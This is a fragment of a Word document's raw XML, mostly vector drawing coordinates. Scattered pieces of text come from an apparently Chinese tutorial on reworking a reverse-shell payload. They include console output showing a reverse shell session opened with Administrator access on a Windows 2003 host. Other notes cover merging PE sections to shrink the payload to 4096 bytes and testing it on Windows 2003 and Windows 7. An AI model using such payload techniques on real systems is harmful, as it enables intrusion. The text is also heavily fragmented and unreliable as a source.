,3866,6954,3866,6956,3866,6958,3866,6960,3866,6963,3866,6965,3866,6967,3866,6970,3866,6972,3866,6975,3866,6977,3866,6980,3866,6983,3866,6985,3866,6988,3866,6991,3866,6994,3866,6997,3866,7000,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3867,7003,3867,7003,3867,7003,3867,7003,3867,7003,3867,7003,3868,7003,3868,7003,3868,7003,3868,7003,3869,7003,3869,7003,3869,7003,3870,7003,3870,7003,3870,7003,3871,7003,3871,7003,3872,7003,3872,7003,3873,7003,3874,7003,3874,7003,3875,7003,3876,7003,3876,7003,3877,7003,3878,7003,3879,7003,3880,7003,3881,7003,3882,7003,3883,7003,3884,7003,3885,7003,3886,7003,3887,7003,3888,7003,3890,7003,3891,7003,3893,7003,3894,7003,3895,7003,3897,7003,3899,7003,3900,7003,3902,7003,3904,7003,3906,7003,3908,7003,3909,7003,3911,7003,3914,7003,3916,7003,3918,7003,3920,7003,3922,7003,3925,7003,3927,7003,3930,7003,3932,7003,3935,7003,3938,7003,3941,7003,3943,7003,3946,7003,3949,7003,3953,7003,3956,7003,3959,7003,3962,7003,3966,7003,3969,7003,3973,7003,3976,7003,3980,7003,3984,7003,3988,7003,3992,7003,3996,7003,4000,7003,4004,7003,4008,7003,4013,7003,4017,7003,4022,7003,4027,7003,4031,7003,4036,7003,4041,7003,4046,7003,4051,7003,4057,7003,4062,7003,4067,7003,4073,7003,4079,7003,4084,7003,4090,7003,4096,7003,4102,7003,4108,7003,4115,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7001,4121,7001,4121,7001,4121,7001,4121,7001,4121,7001,4121,7000,4121,7000,4121,7000,4121,7000,4121,6999,4121,6999,4121,6999,4121,6999,4121,6998,4121,6998,4121,6998,4121,6997,4121,6997,4121,6996,4121,6996,4121,6996,4121,6995,4121,6995,4121,6994,4121,6994,4121,6993,4121,6993,4121,6992,4121,6991,4121,6991,4121,6990,4121,6989,4121,6989,4121,6988,4121,6987,4121,6986,4121,6986,4121,6985,4121,6984,4121,6983,4121,6982,4121,6981,4121,6980,4121,6979,4121,6978,4121,6977,4121,6976,4121,6975,4121,6974,4121,6972,4121,6971,4121,6970,4121,6969,4121,6967,4121,6966,4121,6965,4121,6963,4121,6962,4121,6960,4121,6959,4121,6957,4121,6956,4121,6954,4121,6952,4121,6951,4121,6949,4121,6947,4121,6945,4121,6943,4121,6941,4121,6939,4121,6938,4121,6935,4121,6933,4121,6931,4121,6929,4121,6927,4121,6925,4121,6922,4121,6920,4121,6918,4121,6915,4121,6913,4121,6910,4121,6908,4121,6905,4121,6902,4121,6900,4121,6897,4121,6894,4121,6891,4121,6888,4121,6885,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4120,6882,4120,6882,4120,6882,4120,6882,4120,6882,4120,6882,4119,6882,4119,6882,4119,6882,4119,6882,4118,6882,4118,6882,4118,6882,4117,6882,4117,6882,4117,6882,4116,6882,4116,6882,4115,6882,4115,6882,4114,6882,4113,6882,4113,6882,4112,6882,4111,6882,4111,6882,4110,6882,4109,6882,4108,6882,4107,6882,4106,6882,4105,6882,4104,6882,4103,6882,4102,6882,4101,6882,4100,6882,4099,6882,4097,6882,4096,6882,4094,6882,4093,6882,4092,6882,4090,6882,4088,6882,4087,6882,4085,6882,4083,6882,4081,6882,4079,6882,4078,6882,4076,6882,4073,6882,4071,6882,4069,6882,4067,6882,4065,6882,4062,6882,4060,6882,4057,6882,4055,6882,4052,6882,4049,6882,4046,6882,4044,6882,4041,6882,4038,6882,4034,6882,4031,6882,4028,6882,4025,6882,4021,6882,4018,6882,4014,6882,4011,6882,4007,6882,4003,6882,3999,6882,3995,6882,3991,6882,3987,6882,3983,6882,3979,6882,3974,6882,3970,6882,3965,6882,3960,6882,3956,6882,3951,6882,3946,6882,3941,6882,3936,6882,3930,6882,3925,6882,3920,6882,3914,6882,3908,6882,3903,6882,3897,6882,3891,6882,3885,6882,3879,6882,3872,6882,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:227.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,4550" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:4550;width:130;height:270" coordorigin="3390,4550" coordsize="130,270" path="m3416,4571l3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3417,4571,3417,4571,3417,4571,3417,4571,3417,4571,3417,4571,3417,4571,3418,4571,3418,4571,3418,4571,3418,4571,3419,4571,3419,4571,3419,4571,3419,4571,3420,4571,3420,4571,3420,4571,3421,4571,3421,4571,3421,4571,3422,4571,3422,4571,3423,4571,3423,4571,3424,4571,3424,4571,3425,4571,3425,4571,3426,4571,3426,4571,3427,4571,3428,4571,3428,4571,3429,4571,3430,4571,3430,4571,3431,4571,3432,4571,3433,4571,3434,4571,3434,4571,3435,4571,3436,4571,3437,4571,3438,4571,3439,4571,3440,4571,3441,4571,3442,4571,3443,4571,3445,4571,3446,4571,3447,4571,3448,4571,3450,4571,3451,4571,3452,4571,3454,4571,3455,4571,3456,4571,3458,4571,3459,4571,3461,4571,3463,4571,3464,4571,3466,4571,3468,4571,3469,4571,3471,4571,3473,4571,3475,4571,3477,4571,3479,4571,3481,4571,3483,4571,3485,4571,3487,4571,3489,4571,3491,4571,3494,4571,3496,4571,3498,4571,3501,4571,3503,4571,3505,4571,3508,4571,3511,4571,3513,4571,3516,4571,3519,4571,3521,4571,3524,4571,3527,4571,3530,4571,3533,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4573,3536,4573,3536,4573,3536,4573,3536,4573,3536,4574,3536,4574,3536,4574,3536,4575,3536,4575,3536,4575,3536,4576,3536,4576,3536,4577,3536,4577,3536,4578,3536,4578,3536,4579,3536,4580,3536,4580,3536,4581,3536,4582,3536,4583,3536,4583,3536,4584,3536,4585,3536,4586,3536,4587,3536,4588,3536,4589,3536,4590,3536,4591,3536,4593,3536,4594,3536,4595,3536,4596,3536,4598,3536,4599,3536,4601,3536,4602,3536,4604,3536,4606,3536,4607,3536,4609,3536,4611,3536,4613,3536,4615,3536,4617,3536,4619,3536,4621,3536,4623,3536,4625,3536,4628,3536,4630,3536,4633,3536,4635,3536,4638,3536,4640,3536,4643,3536,4646,3536,4649,3536,4652,3536,4655,3536,4658,3536,4661,3536,4664,3536,4668,3536,4671,3536,4674,3536,4678,3536,4682,3536,4685,3536,4689,3536,4693,3536,4697,3536,4701,3536,4705,3536,4709,3536,4714,3536,4718,3536,4723,3536,4727,3536,4732,3536,4737,3536,4742,3536,4747,3536,4752,3536,4757,3536,4762,3536,4767,3536,4773,3536,4778,3536,4784,3536,4790,3536,4796,3536,4802,3536,4808,3536,4814,3536,4820,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3534,4826,3534,4826,3534,4826,3534,4826,3534,4826,3533,4826,3533,4826,3533,4826,3533,4826,3532,4826,3532,4826,3532,4826,3532,4826,3531,4826,3531,4826,3531,4826,3530,4826,3530,4826,3529,4826,3529,4826,3528,4826,3528,4826,3527,4826,3527,4826,3526,4826,3526,4826,3525,4826,3525,4826,3524,4826,3523,4826,3523,4826,3522,4826,3521,4826,3520,4826,3520,4826,3519,4826,3518,4826,3517,4826,3516,4826,3515,4826,3514,4826,3513,4826,3512,4826,3511,4826,3510,4826,3509,4826,3508,4826,3507,4826,3506,4826,3505,4826,3503,4826,3502,4826,3501,4826,3499,4826,3498,4826,3496,4826,3495,4826,3494,4826,3492,4826,3490,4826,3489,4826,3487,4826,3486,4826,3484,4826,3482,4826,3480,4826,3478,4826,3477,4826,3475,4826,3473,4826,3471,4826,3469,4826,3467,4826,3465,4826,3462,4826,3460,4826,3458,4826,3456,4826,3453,4826,3451,4826,3449,4826,3446,4826,3444,4826,3441,4826,3438,4826,3436,4826,3433,4826,3430,4826,3427,4826,3425,4826,3422,4826,3419,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4825,3416,4825,3416,4825,3416,4825,3416,4825,3416,4824,3416,4824,3416,4824,3416,4823,3416,4823,3416,4823,3416,4822,3416,4822,3416,4821,3416,4821,3416,4820,3416,4820,3416,4819,3416,4819,3416,4818,3416,4817,3416,4817,3416,4816,3416,4815,3416,4814,3416,4814,3416,4813,3416,4812,3416,4811,3416,4810,3416,4809,3416,4807,3416,4806,3416,4805,3416,4804,3416,4803,3416,4801,3416,4800,3416,4798,3416,4797,3416,4795,3416,4794,3416,4792,3416,4790,3416,4789,3416,4787,3416,4785,3416,4783,3416,4781,3416,4779,3416,4777,3416,4774,3416,4772,3416,4770,3416,4768,3416,4765,3416,4763,3416,4760,3416,4757,3416,4755,3416,4752,3416,4749,3416,4746,3416,4743,3416,4740,3416,4737,3416,4733,3416,4730,3416,4727,3416,4723,3416,4720,3416,4716,3416,4712,3416,4709,3416,4705,3416,4701,3416,4697,3416,4692,3416,4688,3416,4684,3416,4680,3416,4675,3416,4670,3416,4666,3416,4661,3416,4656,3416,4651,3416,4646,3416,4641,3416,4636,3416,4630,3416,4625,3416,4619,3416,4614,3416,4608,3416,4602,3416,4596,3416,4590,3416,4584,3416,4578,3416,4571e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:264.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,5290" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:5290;width:130;height:270" coordorigin="3390,5290" coordsize="130,270" path="m3416,5307l3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3417,5307,3417,5307,3417,5307,3417,5307,3417,5307,3417,5307,3417,5307,3418,5307,3418,5307,3418,5307,3418,5307,3419,5307,3419,5307,3419,5307,3419,5307,3420,5307,3420,5307,3420,5307,3421,5307,3421,5307,3421,5307,3422,5307,3422,5307,3423,5307,3423,5307,3424,5307,3424,5307,3425,5307,3425,5307,3426,5307,3426,5307,3427,5307,3428,5307,3428,5307,3429,5307,3430,5307,3430,5307,3431,5307,3432,5307,3433,5307,3434,5307,3434,5307,3435,5307,3436,5307,3437,5307,3438,5307,3439,5307,3440,5307,3441,5307,3442,5307,3443,5307,3445,5307,3446,5307,3447,5307,3448,5307,3450,5307,3451,5307,3452,5307,3454,5307,3455,5307,3456,5307,3458,5307,3459,5307,3461,5307,3463,5307,3464,5307,3466,5307,3468,5307,3469,5307,3471,5307,3473,5307,3475,5307,3477,5307,3479,5307,3481,5307,3483,5307,3485,5307,3487,5307,3489,5307,3491,5307,3494,5307,3496,5307,3498,5307,3501,5307,3503,5307,3505,5307,3508,5307,3511,5307,3513,5307,3516,5307,3519,5307,3521,5307,3524,5307,3527,5307,3530,5307,3533,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5308,3536,5308,3536,5308,3536,5308,3536,5308,3536,5309,3536,5309,3536,5309,3536,5309,3536,5310,3536,5310,3536,5310,3536,5311,3536,5311,3536,5312,3536,5312,3536,5313,3536,5313,3536,5314,3536,5314,3536,5315,3536,5316,3536,5316,3536,5317,3536,5318,3536,5319,3536,5320,3536,5320,3536,5321,3536,5322,3536,5323,3536,5324,3536,5326,3536,5327,3536,5328,3536,5329,3536,5331,3536,5332,3536,5333,3536,5335,3536,5336,3536,5338,3536,5339,3536,5341,3536,5343,3536,5345,3536,5346,3536,5348,3536,5350,3536,5352,3536,5354,3536,5356,3536,5359,3536,5361,3536,5363,3536,5366,3536,5368,3536,5371,3536,5373,3536,5376,3536,5379,3536,5381,3536,5384,3536,5387,3536,5390,3536,5393,3536,5396,3536,5400,3536,5403,3536,5406,3536,5410,3536,5413,3536,5417,3536,5421,3536,5425,3536,5428,3536,5432,3536,5436,3536,5441,3536,5445,3536,5449,3536,5454,3536,5458,3536,5463,3536,5467,3536,5472,3536,5477,3536,5482,3536,5487,3536,5492,3536,5497,3536,5503,3536,5508,3536,5514,3536,5519,3536,5525,3536,5531,3536,5537,3536,5543,3536,5549,3536,5555,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3534,5562,3534,5562,3534,5562,3534,5562,3534,5562,3533,5562,3533,5562,3533,5562,3533,5562,3532,5562,3532,5562,3532,5562,3532,5562,3531,5562,3531,5562,3531,5562,3530,5562,3530,5562,3529,5562,3529,5562,3528,5562,3528,5562,3527,5562,3527,5562,3526,5562,3526,5562,3525,5562,3525,5562,3524,5562,3523,5562,3523,5562,3522,5562,3521,5562,3520,5562,3520,5562,3519,5562,3518,5562,3517,5562,3516,5562,3515,5562,3514,5562,3513,5562,3512,5562,3511,5562,3510,5562,3509,5562,3508,5562,3507,5562,3506,5562,3505,5562,3503,5562,3502,5562,3501,5562,3499,5562,3498,5562,3496,5562,3495,5562,3494,5562,3492,5562,3490,5562,3489,5562,3487,5562,3486,5562,3484,5562,3482,5562,3480,5562,3478,5562,3477,5562,3475,5562,3473,5562,3471,5562,3469,5562,3467,5562,3465,5562,3462,5562,3460,5562,3458,5562,3456,5562,3453,5562,3451,5562,3449,5562,3446,5562,3444,5562,3441,5562,3438,5562,3436,5562,3433,5562,3430,5562,3427,5562,3425,5562,3422,5562,3419,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5560,3416,5560,3416,5560,3416,5560,3416,5559,3416,5559,3416,5559,3416,5558,3416,5558,3416,5558,3416,5557,3416,5557,3416,5556,3416,5556,3416,5555,3416,5555,3416,5554,3416,5553,3416,5553,3416,5552,3416,5551,3416,5551,3416,5550,3416,5549,3416,5548,3416,5547,3416,5546,3416,5545,3416,5544,3416,5543,3416,5542,3416,5541,3416,5539,3416,5538,3416,5537,3416,5535,3416,5534,3416,5532,3416,5531,3416,5529,3416,5527,3416,5526,3416,5524,3416,5522,3416,5520,3416,5518,3416,5516,3416,5514,3416,5512,3416,5510,3416,5508,3416,5505,3416,5503,3416,5500,3416,5498,3416,5495,3416,5493,3416,5490,3416,5487,3416,5484,3416,5481,3416,5478,3416,5475,3416,5472,3416,5469,3416,5465,3416,5462,3416,5459,3416,5455,3416,5451,3416,5448,3416,5444,3416,5440,3416,5436,3416,5432,3416,5428,3416,5424,3416,5419,3416,5415,3416,5410,3416,5406,3416,5401,3416,5396,3416,5391,3416,5387,3416,5381,3416,5376,3416,5371,3416,5366,3416,5360,3416,5355,3416,5349,3416,5343,3416,5337,3416,5332,3416,5325,3416,5319,3416,5313,3416,5307e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:402.600pt;width:343.800pt;height:335.399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6" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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Started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reverse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Sending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stage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179779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bytes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.119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3710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session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opened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3887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2019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01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27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14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30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27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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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6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getuid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11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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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username: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WIN03X64\Administrator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8272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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="21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第二次优化p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ayload：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载入P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EID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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合并data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de3f29"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to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de3f29"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>text，rdata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de3f29"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to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de3f29"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>text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de3f29"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在次生成。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467.400pt;height:86.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId30" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:216.600pt;width:336.600pt;height:295.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId31" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:572.400pt;width:259.800pt;height:63.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId32" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:696.600pt;width:467.400pt;height:94.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ection变化如下：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p</w:t>
      </w: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ayload大小如下：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4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096字节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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二次靶机测试：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分别测试Windows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2003，Windws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7，reverse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OK。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70.500pt;width:0.500pt;height:213.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1410" coordsize="10,4270">
        <v:shape style="position:absolute;left:10390;top:1410;width:10;height:4270" coordorigin="10390,1410" coordsize="10,4270" path="m10402,1420l10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1421,10402,1421,10402,1422,10402,1422,10402,1423,10402,1424,10402,1425,10402,1427,10402,1428,10402,1430,10402,1432,10402,1434,10402,1437,10402,1440,10402,1443,10402,1447,10402,1450,10402,1455,10402,1459,10402,1464,10402,1469,10402,1475,10402,1481,10402,1488,10402,1495,10402,1503,10402,1511,10402,1519,10402,1528,10402,1538,10402,1548,10402,1558,10402,1570,10402,1582,10402,1594,10402,1607,10402,1621,10402,1635,10402,1650,10402,1666,10402,1682,10402,1699,10402,1717,10402,1736,10402,1755,10402,1775,10402,1796,10402,1818,10402,1841,10402,1864,10402,1888,10402,1913,10402,1939,10402,1966,10402,1994,10402,2022,10402,2052,10402,2083,10402,2114,10402,2147,10402,2180,10402,2215,10402,2251,10402,2287,10402,2325,10402,2364,10402,2404,10402,2445,10402,2487,10402,2530,10402,2574,10402,2620,10402,2667,10402,2715,10402,2764,10402,2814,10402,2866,10402,2919,10402,2973,10402,3028,10402,3085,10402,3143,10402,3203,10402,3264,10402,3326,10402,3389,10402,3454,10402,3520,10402,3588,10402,3657,10402,3728,10402,3800,10402,3874,10402,3949,10402,4026,10402,4104,10402,4183,10402,4265,10402,4348,10402,4432,10402,4518,10402,4606,10402,4695,10402,4786,10402,4879,10402,4973,10402,5069,10402,5167,10402,5266,10402,5368,10402,5471,10402,5575,10402,5682e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1410;width:8990;height:390" coordorigin="1490,1410" coordsize="8990,390" path="m1510,1420l1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1511,1420,1512,1420,1512,1420,1514,1420,1515,1420,1517,1420,1519,1420,1521,1420,1524,1420,1528,1420,1532,1420,1536,1420,1541,1420,1546,1420,1552,1420,1559,1420,1566,1420,1575,1420,1583,1420,1593,1420,1603,1420,1615,1420,1627,1420,1640,1420,1654,1420,1668,1420,1684,1420,1701,1420,1719,1420,1738,1420,1758,1420,1780,1420,1802,1420,1826,1420,1851,1420,1877,1420,1904,1420,1933,1420,1963,1420,1995,1420,2028,1420,2063,1420,2099,1420,2136,1420,2175,1420,2216,1420,2259,1420,2303,1420,2348,1420,2396,1420,2445,1420,2496,1420,2549,1420,2604,1420,2660,1420,2719,1420,2779,1420,2841,1420,2906,1420,2972,1420,3041,1420,3112,1420,3184,1420,3259,1420,3336,1420,3416,1420,3498,1420,3582,1420,3668,1420,3757,1420,3848,1420,3941,1420,4037,1420,4136,1420,4236,1420,4340,1420,4446,1420,4555,1420,4666,1420,4780,1420,4897,1420,5017,1420,5139,1420,5264,1420,5392,1420,5523,1420,5657,1420,5793,1420,5933,1420,6076,1420,6222,1420,6370,1420,6522,1420,6677,1420,6835,1420,6997,1420,7161,1420,7329,1420,7500,1420,7675,1420,7853,1420,8034,1420,8219,1420,8407,1420,8598,1420,8793,1420,8992,1420,9194,1420,9400,1420,9609,1420,9823,1420,10039,1420,10260,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1421,10484,1421,10484,1421,10484,1421,10484,1422,10484,1422,10484,1422,10484,1423,10484,1423,10484,1423,10484,1424,10484,1424,10484,1425,10484,1425,10484,1426,10484,1427,10484,1427,10484,1428,10484,1429,10484,1430,10484,1431,10484,1431,10484,1432,10484,1433,10484,1435,10484,1436,10484,1437,10484,1438,10484,1439,10484,1441,10484,1442,10484,1444,10484,1445,10484,1447,10484,1449,10484,1450,10484,1452,10484,1454,10484,1456,10484,1458,10484,1460,10484,1463,10484,1465,10484,1467,10484,1470,10484,1472,10484,1475,10484,1478,10484,1480,10484,1483,10484,1486,10484,1489,10484,1493,10484,1496,10484,1499,10484,1503,10484,1506,10484,1510,10484,1514,10484,1517,10484,1521,10484,1525,10484,1530,10484,1534,10484,1538,10484,1543,10484,1547,10484,1552,10484,1557,10484,1562,10484,1567,10484,1572,10484,1578,10484,1583,10484,1589,10484,1594,10484,1600,10484,1606,10484,1612,10484,1618,10484,1625,10484,1631,10484,1638,10484,1644,10484,1651,10484,1658,10484,1665,10484,1673,10484,1680,10484,1688,10484,1695,10484,1703,10484,1711,10484,1720,10484,1728,10484,1736,10484,1745,10484,1754,10484,1763,10484,1772,10484,1781,10484,1791,10484,1800,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10483,1810,10482,1810,10482,1810,10480,1810,10479,1810,10477,1810,10475,1810,10473,1810,10470,1810,10466,1810,10462,1810,10458,1810,10453,1810,10448,1810,10442,1810,10435,1810,10428,1810,10419,1810,10411,1810,10401,1810,10391,1810,10379,1810,10367,1810,10354,1810,10340,1810,10326,1810,10310,1810,10293,1810,10275,1810,10256,1810,10236,1810,10215,1810,10192,1810,10168,1810,10143,1810,10117,1810,10090,1810,10061,1810,10031,1810,9999,1810,9966,1810,9931,1810,9895,1810,9858,1810,9819,1810,9778,1810,9735,1810,9691,1810,9646,1810,9598,1810,9549,1810,9498,1810,9445,1810,9391,1810,9334,1810,9275,1810,9215,1810,9153,1810,9088,1810,9022,1810,8953,1810,8883,1810,8810,1810,8735,1810,8658,1810,8578,1810,8497,1810,8413,1810,8326,1810,8238,1810,8146,1810,8053,1810,7957,1810,7859,1810,7758,1810,7654,1810,7548,1810,7439,1810,7328,1810,7214,1810,7097,1810,6977,1810,6855,1810,6730,1810,6602,1810,6471,1810,6337,1810,6201,1810,6061,1810,5918,1810,5773,1810,5624,1810,5472,1810,5317,1810,5159,1810,4997,1810,4833,1810,4665,1810,4494,1810,4319,1810,4141,1810,3960,1810,3776,1810,3587,1810,3396,1810,3201,1810,3002,1810,2800,1810,2594,1810,2385,1810,2172,1810,1955,1810,1734,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1808,1510,1808,1510,1808,1510,1807,1510,1807,1510,1807,1510,1806,1510,1806,1510,1805,1510,1805,1510,1804,1510,1804,1510,1803,1510,1802,1510,1802,1510,1801,1510,1800,1510,1799,1510,1798,1510,1797,1510,1796,1510,1795,1510,1794,1510,1793,1510,1791,1510,1790,1510,1789,1510,1787,1510,1786,1510,1784,1510,1783,1510,1781,1510,1779,1510,1777,1510,1775,1510,1773,1510,1771,1510,1769,1510,1767,1510,1765,1510,1762,1510,1760,1510,1757,1510,1755,1510,1752,1510,1749,1510,1746,1510,1743,1510,1740,1510,1737,1510,1734,1510,1730,1510,1727,1510,1723,1510,1720,1510,1716,1510,1712,1510,1708,1510,1704,1510,1700,1510,1696,1510,1691,1510,1687,1510,1682,1510,1678,1510,1673,1510,1668,1510,1663,1510,1657,1510,1652,1510,1647,1510,1641,1510,1635,1510,1630,1510,1624,1510,1618,1510,1611,1510,1605,1510,1599,1510,1592,1510,1585,1510,1578,1510,1571,1510,1564,1510,1557,1510,1549,1510,1542,1510,1534,1510,1526,1510,1518,1510,1510,1510,1502,1510,1493,1510,1485,1510,1476,1510,1467,1510,1458,1510,1448,1510,1439,1510,1429,1510,1420e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:69.599pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId34" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:89.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1790" coordsize="8990,350">
